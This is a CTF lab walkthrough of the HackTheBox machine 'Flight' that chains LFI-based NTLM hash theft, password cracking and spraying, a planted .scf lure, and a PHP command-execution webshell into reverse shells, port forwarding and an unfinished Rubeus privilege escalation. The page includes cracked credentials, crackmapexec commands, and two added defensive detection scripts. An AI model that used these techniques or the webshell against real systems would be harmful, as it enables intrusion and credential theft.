
Playing Hacks and Stuffs!


Project maintained by h4ckyou Hosted on GitHub Pages — Theme by mattgraham

Flight HackTheBox

Difficulty = Hard

Nmap scan: [image]

We can see the domain name flight.htb; I added it to my /etc/hosts file.

There are lots of ports, but let's start enumerating.

SMB doesn't allow anonymous listing of shares: [image]

Moving over to the web server on port 80 shows this: [image]

There's nothing really there.

So let's fuzz for subdomains: [image]

I'll update my /etc/hosts file with the new subdomain.

Checking it shows this: [image]

When I clicked on the Home button I got this: [image]

Looking at the URL, we can see that it's including the file home.html.

We can say that this is vulnerable to local file inclusion; let's confirm it: [image]

One way we can exploit this is by trying to perform NTLM hash theft.
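From the defending side, the request pattern behind this step is easy to spot in the web server's access log: the include parameter stops carrying a plain page name and instead carries a ".." traversal or a UNC path of the form \\host\share. The Python below is an added example, not code from the original post or from the box. It parses a handful of constructed Apache-style access-log lines (the IP, timestamps and paths are made up) and flags every parameter value that decodes to a traversal or to a UNC path, which is what a detection rule for this class of LFI abuse would key on.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample Apache access-log lines (not taken from the original post).
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2023:10:00:01 +0000] "GET /index.php?view=home.html HTTP/1.1" 200 1234
10.10.14.5 - - [01/Jan/2023:10:00:07 +0000] "GET /index.php?view=..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 200 98
10.10.14.5 - - [01/Jan/2023:10:00:15 +0000] "GET /index.php?view=%5C%5C10.10.14.5%5Cshare%5Cx HTTP/1.1" 200 0
10.10.14.5 - - [01/Jan/2023:10:00:20 +0000] "GET /index.php?view=about.html HTTP/1.1" 200 2200
"""

# Common log format: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# \\host\share\... or //host/share/... : a UNC path forces an outbound SMB/WebDAV auth
UNC_RE = re.compile(r'^(\\\\|//)[^\\/]+[\\/]')
# a ".." path component in either slash style
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def classify_value(value):
    """Return 'unc', 'traversal' or None for one decoded query-parameter value."""
    # parse_qs already decoded once; decode twice more to catch %25-style double encoding
    # (this is deliberately aggressive: a log triage tool prefers a few false positives)
    v = unquote(unquote(value))
    if UNC_RE.match(v):
        return "unc"
    if TRAVERSAL_RE.search(v):
        return "traversal"
    return None


def find_lfi_attempts(log_text, params=("view",)):
    """Return (ip, param, decoded_value, kind) for every suspicious request.

    `params` limits the check to the include parameter(s) of the application;
    pass an empty tuple to inspect every query parameter.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        query = urlsplit(m["target"]).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            if params and name not in params:
                continue
            for raw in values:
                kind = classify_value(raw)
                if kind:
                    hits.append((m["ip"], name, unquote(unquote(raw)), kind))
    return hits


if __name__ == "__main__":
    for ip, name, value, kind in find_lfi_attempts(SAMPLE_LOG):
        print(f"{ip} {kind:9s} {name}={value}")
```

Only the include parameter is inspected by default, because a site-wide ".." match on every parameter (search strings, free text) produces noise; the UNC check is the one worth alerting on immediately, since a successful include of a UNC path means the web server process has already tried to authenticate to that host.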

Using Responder I'll steal the NTLM hash: [image] [image]

While on the web server I'll do this: [image]

Back on Responder I got the hash for user svc_apache: [image]

I brute forced it using JtR: [image]

Now we have a cred: svc_apache:S@Ss!K@*t13

Trying to authenticate to WinRM fails: [image]

But we can log in to SMB using the cred: [image]

It shows the SMB hostname as G0; I also added that to my /etc/hosts file.

We don't really have good access over the shares, and searching through them doesn't reveal any interesting creds: [image]

One thing we can do, since we have an SMB cred, is to get the list of users on the box via RID brute force and then perform a password spraying attack: [image]

I saved the result in a file, then used bash scripting to extract only the usernames.

Command:
# RID-cycle the domain with the svc_apache credential and keep the raw output
crackmapexec smb flight.htb -u 'svc_apache' -p 'S@Ss!K@*t13' --rid-brute > brute
# field 6 is DOMAIN\name; strip the domain prefix and drop the account we already have
awk '{print $6}' brute | grep flight | cut -d '\' -f 2 | grep -v svc_apache > users.txt

Now we can use kerbrute to perform password spraying: [image]

Cool, we have another user's cred: S.Moon:S@Ss!K@*t13

Trying the cred over WinRM fails: [image]

Checking the permissions the user has over SMB shows this: [image]

Nice, we have write access over the Shared share.

But looking at the share shows that no file is there: [image]

What we can attempt is to upload a file, either .scf or .ini, to perform NTLM hash theft.

I used this script to generate the payload file: [image]
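The counterpart of this step for whoever owns the share is to audit writable shares for shortcut-style files (.scf, .url, desktop.ini) whose icon or URL entries point at a UNC path on a host that is not one of the organisation's own file servers, since it is that reference that makes Explorer authenticate outbound when the folder is merely browsed. The Python below is an added example, not the post's generator script or anything from the box: it builds a small constructed share in a temporary directory (the file names, the attacker host 10.10.14.5 and the allowed file server fs01.flight.htb are all made up for the demo) and reports every remote icon reference to a host outside the allow list. Binary .lnk files are not parsed here; they would need a separate parser.

```python
import re
import tempfile
from pathlib import Path

# Only text-based shortcut formats are inspected; .lnk is binary and handled elsewhere.
SUSPECT_EXT = {".scf", ".url", ".ini"}
# keys whose value Explorer resolves (and authenticates to) when rendering the folder
REMOTE_KEYS = {"iconfile", "iconresource", "url"}
# \\host\..., //host/... or file://host/... : capture the host part
UNC_HOST_RE = re.compile(r'^(?:\\\\|//|file://+)(?P<host>[^\\/]+)[\\/]', re.IGNORECASE)


def parse_ini_like(text):
    """Yield (key, value) pairs from INI-style text; section headers are ignored."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith((";", "#", "[")):
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            yield key.strip().lower(), value.strip()


def remote_icon_refs(text):
    """Return (key, host, raw_value) for every key that points at a remote UNC/file URL."""
    refs = []
    for key, value in parse_ini_like(text):
        if key in REMOTE_KEYS:
            m = UNC_HOST_RE.match(value)
            if m:
                refs.append((key, m["host"], value))
    return refs


def scan_share(root, allowed_hosts=()):
    """Walk a share and report remote icon references to hosts outside the allow list."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SUSPECT_EXT:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        for key, host, value in remote_icon_refs(text):
            if host.lower() not in allowed:
                findings.append({
                    "file": str(path.relative_to(root)),
                    "key": key,
                    "host": host,
                    "value": value,
                })
    return findings


def build_sample_share():
    """Create a constructed sample share (not from the original post) in a temp dir."""
    root = Path(tempfile.mkdtemp(prefix="share_"))
    # legitimate desktop.ini pointing at the (made-up) corporate file server
    (root / "desktop.ini").write_text(
        "[.ShellClassInfo]\nIconResource=\\\\fs01.flight.htb\\icons\\corp.ico,0\n")
    (root / "docs").mkdir()
    (root / "docs" / "report.txt").write_text("nothing to see here\n")
    # planted files whose icon references point at an unknown host
    (root / "@inventory.scf").write_text(
        "[Shell]\nCommand=2\nIconFile=\\\\10.10.14.5\\share\\x.ico\n[Taskbar]\nCommand=ToggleDesktop\n")
    (root / "link.url").write_text(
        "[InternetShortcut]\nURL=file://10.10.14.5/share/a\nIconFile=\\\\10.10.14.5\\share\\b.ico\nIconIndex=1\n")
    return str(root)


if __name__ == "__main__":
    share = build_sample_share()
    for f in scan_share(share, allowed_hosts=["fs01.flight.htb"]):
        print(f"{f['file']}: {f['key']}={f['value']} (host {f['host']} not allowed)")
```

Run it against a real share by pointing scan_share at the mounted path and listing the hosts your icons may legitimately come from; anything it returns is either a misconfigured shortcut or a planted lure, and in both cases the file should be removed and the write permission that allowed it reviewed.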

I had Responder listening already, and after some seconds I got a hit: [image]

I saved the hash, then brute forced it using JtR: [image]

We have another cred: c.bum:Tikkycoll_431012284

Using cme I tried whether it can connect to WinRM, but nope, it can't: [image]

Checking the permissions the user has over SMB gives this: [image]

Nice, we have access over the Web share.

Moving over there shows that this is where the web server files are placed: [image]

I uploaded a PHP command execution script: [image]

<?php
system($_REQUEST['c']);
?>

We can now access it from the web server: [image]

To get a shell I uploaded nc to the SMB share and then got a shell from it: [image] [image]

Shell finally 😃

Let's see what we can do from here: [image]

What I noticed is that the current working directory was C:\xampp\htdocs\flight.htb, yet there's an inetpub directory in the C:\ drive.

So this means maybe there's an internal web app running 🤔

Checking that directory shows this: [image]

We can conclude that the only user privileged to access the development directory is C.Bum.

Though we have the user's cred, our shell doesn't work well when we run runas, so I'll need a better shell.

Luckily there's a tool called RunasCs that can help with this.

I uploaded it to the box and switched to user c.bum: [image]

Back in the web directory, it shows the user has write access over it: [image]

So what I did was upload an ASPX shell, since the web server will be IIS: [image]

Now let's see if there's any internal port: [image]

Command: netstat -ano

Port 8000 looks promising because something is listening on it.

And yeah, it's a web server: [image]

Using chisel I port forwarded the internal port: [image]

Back on our host we can now access the internal web server: [image]

Accessing our shell is as easy as going to /shell.aspx: [image]

I got a reverse shell using nc: [image]

We can see that we're user iis apppool\defaultapppool, which is a Microsoft virtual account. One thing about these accounts is that when they authenticate over the network, they do so as the machine account.

From this we can abuse it by asking the machine for a ticket for the machine account over the network.

The tool that is used is Rubeus.

*** NOT YET PWNED ***